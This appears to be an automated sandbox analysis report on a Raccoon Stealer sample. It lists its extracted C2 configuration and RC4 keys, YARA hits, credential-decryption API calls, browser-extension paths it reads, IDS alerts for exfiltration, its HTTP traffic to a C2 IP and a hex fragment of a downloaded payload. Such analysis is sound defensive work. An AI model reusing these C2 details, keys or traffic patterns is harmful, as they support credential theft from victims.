Source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack |
Malware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"} |
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Virustotal: Detection: 33% |
Perma Link |
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
ReversingLabs: Detection: 37% |
Source: Yara match |
File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree, |
1_2_0042A130 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData, |
1_2_0040E139 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_0040CF54 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData, |
1_2_0040CF54 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_0040F2E6 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,LocalFree, |
1_2_0040F2E6 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_0040D684 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree, |
1_2_0040D684 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree, |
1_2_00429F5D |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA, |
1_2_00434A5F |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Unpacked PE file: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack |
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr |
Source: |
Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.1.dr |
Source: |
Binary string: ucrtbase.pdb source: ucrtbase.dll.1.dr |
Source: |
Binary string: api-ms-win-core-memory-l1-1-0.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.1.dr |
Source: |
Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr |
Source: |
Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.1.dr |
Source: |
Binary string: PC:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.1.dr |
Source: |
Binary string: msvcp140.i386.pdb source: msvcp140.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.1.dr |
Source: |
Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.1.dr |
Source: |
Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.1.dr |
Source: |
Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.1.dr |
Source: |
Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327457378.000000006E4F9000.00000002.00020000.sdmp, mozglue.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr |
Source: |
Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr |
Source: |
Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.1.dr |
Source: |
Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.1.dr |
Source: |
Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.1.dr |
Source: |
Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.1.dr |
Source: |
Binary string: C:\boguxuram_wizuz\hakekuna.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Source: |
Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr |
Source: |
Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.1.dr |
Source: |
Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.1.dr |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
Code function: 1_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, |
1_2_0043EFDD |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ |
Jump to behavior |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe |
File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ |
Jump to behavior |
Source: Traffic |
Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49745 -> 185.138.164.150:80 |
Source: Traffic |
Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49745 -> 185.138.164.150:80 |
Source: Malware configuration extractor |
URLs: https://t.me/agrybirdsgamerept |
Source: global traffic |
HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me |
Source: global traffic |
HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150 |
Source: global traffic |
HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150 |
Source: global traffic |
HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150 |
Source: global traffic |
HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1405Host: 185.138.164.150 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 21:55:24 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c |